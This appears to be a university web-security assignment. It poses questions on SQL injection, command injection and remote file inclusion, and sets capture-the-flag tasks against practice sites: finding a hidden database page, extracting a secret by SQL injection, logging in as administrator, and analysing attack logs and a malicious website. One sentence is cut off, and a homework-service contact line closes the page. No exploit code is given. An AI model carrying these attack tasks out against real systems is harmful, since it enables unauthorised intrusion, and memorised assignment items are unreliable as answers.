1 Pentesting a server
a i) Briefly describe the SQL injection, Command injection and Remote file
inclusion vulnerabilities. Specify what capabilities each vulnerability
provides to an attacker when it is exploited on a given server.
ii) Suppose you are not allowed to access the code of a web application
deployed on a server. Explain how you could use an Intrusion Detection
System (IDS) to mitigate the 3 vulnerabilities from section (a.i). Discuss
specific limitations of this approach relevant to the vulnerabilities
b You are tasked with a black-box pentesting exercise against cybersec.fun. The
rules of engagement specify that: you should not use automated tools; you
should not attempt to modify data on the server; you should not cause denial of
service on the server. The goal is to demonstrate access to a hidden database.
i) Gather information about cybersec.fun, and find the URL for a web page
that provides access to the hidden database. Report the flag that you see
displayed on that page. Briefly describe the steps taken.
ii) Use SQL injection to read the secret of the record with id = 331 from the
items table of the database. Report the secret value as a flag. Briefly
describe the steps taken.
iii) Find a way to login as database administrator, and report the flag you
discover when you manage to do so. Briefly describe the steps taken.
The two parts carry equal marks.
2 Attacks and defenses
a i) The file ssl-access.log contains web logs from a server. Identify 3
malicious entries. For each entry, describe the attack attempt and propose
the mitigation to be deployed in the server-side code of the web application
itself that you consider most effective and relevant, justifying your answer.
b In this part you analyse malicious scripts and websites. These are realistic
examples but are designed not to cause any harm or other side effect to your
Identify what kind of attack it is trying to perform, and report the flag you
discover in the process.
ii) You are tasked to analyse the malicious website nah.fun. The site uses the
browser of innocent visitors to attack a third party server. Analyse the
attack, with the goal of tricking the attacker into thinking that the attack
was successful. Report the 2 flags that you discover during this process,
and briefly describe the steps you have taken.
The two parts carry, respectively, 60% and 40% of the marks.
本网站支持 Alipay WeChatPay PayPal等支付方式
E-mail: email@example.com 微信号:vipnxx